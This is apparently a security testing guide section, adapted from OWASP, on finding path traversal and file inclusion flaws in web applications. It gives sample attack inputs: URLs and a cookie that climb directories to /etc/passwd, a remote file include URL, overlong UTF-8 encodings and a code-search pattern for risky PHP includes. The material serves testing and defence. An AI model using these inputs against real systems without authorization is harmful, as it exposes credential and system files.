Brief Summary

Many web applications use and manage files as part of their daily operation. Using input validation methods that have not been well designed or deployed, an aggressor could exploit the system in order to read/write files that are not intended to be accessible; in particular situations it could be possible to execute arbitrary code or system commands.

How to Review Code for Path Traversal Vulnerabilities

Description of the Issue

Traditionally web servers and web applications implement authentication mechanisms in order to control access to files and resources.
Web servers try to confine users' files inside a "root directory" or "web document root" which represent a physical directory on the file system; users have to consider this directory as the base directory into the hierarchical structure of the web application.
The definition of the privileges is made using Access Control Lists (ACL) that identify which users or groups are supposed to be able to access, modify or execute a specific file on the server.
These mechanisms are designed to prevent access to sensitive files from malicious users (example: the common /etc/passwd on a Unix-like platform) or to avoid the execution of system commands.

Many web applications use server-side scripts to include different kinds of files: it is quite common to use this method to manage graphics, templates, load static texts, and so on. Unfortunately, these applications expose security vulnerabilities if input parameters (i.e. form parameters, cookies values) are not correctly validated.

In web servers and web applications, this kind of problem arises in directory traversal/file include attacks; exploiting this kind of vulnerability an attacker is able read directories or files which he/she normally couldn't read, access data outside the web document root, or include scripts and other kinds of files from external websites.

For the purpose of the OWASP Testing Guide, we will just consider the security threats related to web applications and not to web servers (i.e. the infamous "%5c escape code" into Microsoft IIS web server). We will provide further reading suggestions in the references section, for interested readers.

This kind of attack is also known as the dot-dot-slash attack (../), path traversal, directory climbing, or backtracking.

During an assessment, in order to discover directory traversal and file include flaws, we need to perform two different stages:

(b) Testing Techniques (a methodical evaluation of each attack technique used by an aggressor to exploit the vulnerability)

Black Box testing and example

(a) Input Vectors Enumeration
In order to determine which part of the application is vulnerable to input validation bypassing, the tester needs to enumerate all parts of the application which accept content from the user. This also includes HTTP GET and POST queries and common options like file uploads and HTML forms.

The next stage of testing is analyzing the input validation functions present into the web application.

Using the previous example, the dynamic page called getUserProfile.jsp loads static information from a file, showing the content to users. An attacker could insert the malicious string "../../../../etc/passwd" to include the password hash file of a Linux/Unix system.
Obviously this kind of attack is possible only if the validation checkpoint fails; according to the filesystem privileges, the web application itself must be able to read the file.

To successfully test for this flaw, the tester needs to have knowledge of the system being tested and the location of the files being requested. There is no point requesting /etc/passwd from an IIS web server.

http://example.com/getUserProfile.jsp?item=../../../../etc/passwd

For the cookies example, we have:

Cookie: USER=1826cc8f:PSTYLE=../../../../etc/passwd

It's also possible to include files, and scripts, located on external website.

http://example.com/index.php?file=http://www.owasp.org/malicioustxt

The following example will demonstrate how it is possible to show the source code of a CGI component, without using any path traversal chars.

http://example.com/main.cgi?home=main.cgi

The component called "main.cgi" is located in the same directory as the normal HTML static files used by the application.
In some cases the tester needs to encode the requests using special characters (like the "." dot, "%00" null, ...) in order to bypass file extension controls or to prevent script execution.

Tip
It's a common mistake by developers to not expect every form of encoding and therefore only do validation for basic encoded content. If at first your test string isn't successful, try another encoding scheme.

Unicode/UTF-8 Encoding (It just works in systems which are able to accept overlong UTF-8 sequences)

..%c0%af represents ../
..%c1%9c represents ..\

Gray Box testing and example

When the analysis is performed with a Gray Box approach, we have to follow the same methodology as in Black Box Testing. However, since we can review the source code, it is possible to search the input vectors (stage (a) of the testing) more easily and accurately.
During a source code review we can use simple tools (such as the grep command) to search for one or more common patterns within the application code: inclusion functions/methods, filesystem operations, and so on.

Using online code search engines (Google CodeSearch[1], Koders[2]) it may also be possible to find directory traversal flaws in OpenSource software published on the Internet.

For PHP, we can use:

lang:php (include|require)(_once)?\s*['"(]?\s*\$_(GET|POST|COOKIE)

Using the Gray Box Testing method, it is possible to discover vulnerabilities that are usually harder to discover, or even impossible to find during a standard Black Box assessment.

Some web applications generate dynamic pages using values and parameters stored in a database. It may be possible to insert specially crafted directory traversal strings when the application adds data to the database. This kind of security problem is difficult to discover due to the fact the parameters inside the inclusion functions seem internal and "safe" but otherwise they are not.

Additionally, reviewing the source code, it is possible to analyze the functions that are supposed to handle invalid input: some developers try to change invalid input to make it valid, avoiding warnings and errors. These functions are usually prone to security flaws.